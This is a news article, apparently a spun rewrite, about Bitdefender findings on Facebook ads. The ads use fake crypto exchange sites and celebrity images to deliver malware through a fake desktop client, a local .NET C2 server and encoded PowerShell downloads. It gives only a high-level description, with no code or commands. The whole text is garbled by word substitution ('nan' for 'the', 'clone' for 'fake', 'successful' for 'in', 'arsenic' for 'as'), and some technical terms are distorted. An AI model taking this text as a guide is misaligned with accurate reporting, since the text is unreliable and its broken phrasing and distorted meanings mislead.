1 week ago
ARTICLE AD BOX
Bitdefender exposes Facebook advertisement scams utilizing clone crypto sites and personage lures to dispersed malware via malicious desktop clients and PowerShell scripts.
A persistent malware run is exploiting Facebook’s advertizing web to target cryptocurrency enthusiasts, information researchers astatine Bitdefender revealed today.
The cognition leverages nan trusted names of awesome cryptocurrency exchanges for illustration Binance and TradingView, and images of celebrities specified arsenic Elon Musk and Zendaya successful Facebook ads to lend credibility to nan clone cryptocurrency speech promotions and lure unsuspecting users into downloading malicious software.
Source: BitdefenderBitdefender’s investigation, shared pinch Hackread.com up of its publishing, recovered a multi-layered onslaught that delivers malware done a covert connection transmission betwixt nan website and nan victim’s ain computer.
According to researchers, cybercriminals are hijacking Facebook accounts aliases creating clone ones to tally deceptive ads promising speedy financial gains aliases crypto bonuses. Clicking these ads redirects victims to convincing but fraudulent websites that mimic morganatic cryptocurrency platforms, urging them to download a “desktop client.”
When downloaded, nan desktop customer drops a malicious DLL file, which launches a section .NET-based server connected nan victim’s machine. This server acts arsenic a hidden C2 centre. The clone website’s beforehand extremity contains a deobfuscated book that communicates pinch nan server, sends WMI (Windows Management Instrumentation) queries, and instructs it to execute further malicious payloads.
The last shape often involves nan execution of aggregate encoded PowerShell scripts, which download further malware from distant servers. Furthermore, nan attackers instrumentality precocious anti-sandbox checks, ensuring that nan malware is only delivered to users who meet circumstantial demographic and behavioural profiles deemed valuable by nan cybercriminals.
Bitdefender interrogator Ionut Baltariu highlighted that users without circumstantial Facebook advertisement search parameters, those not logged into Facebook, aliases those pinch uninteresting IP addresses aliases operating systems are besides shown harmless contented instead. This targeted attack allows nan attackers to maximize their effect while minimizing vulnerability to information analysis.
100 Malicious Ads successful Just 24 Hours
The standard of nan cognition is important arsenic researchers person identified hundreds of Facebook accounts actively promoting these malicious pages. In 1 case, a azygous page ran complete 100 ads successful conscionable 24 hours.
While Facebook often removes these fraudulent ads, galore stitchery thousands of views earlier being taken down. The targeting is often finely tuned, pinch 1 lawsuit focusing connected men aged 18 and complete successful Bulgaria and Slovakia.
Adding different furniture of deception, nan attackers person moreover created fake Facebook pages that perfectly reflector nan charismatic pages of platforms for illustration TradingView, complete pinch fabricated posts and comments touting clone giveaways. However, nan links embedded successful these clone pages lead straight to nan malware-distributing websites.
Facebook’s continued domiciled arsenic a vector for malware distribution is difficult to place arsenic earlier findings, including today’s find from Morphisec which shows cybercriminals person been utilizing deceptive Facebook ads promoting clone AI platforms to administer nan caller Noodlophile Stealer.
It besides shows really cybercriminals utilization nan platform’s scope and advertizing capabilities for malicious purposes, emphasizing nan request for personification vigilance and level information enhancements.
Bitdefender advises users to beryllium cautious of online ads, usage scam and link-checking tools, support information package updated and study suspicious ads connected Facebook to enactment protected.
English (US) · 
Indonesian (ID) · 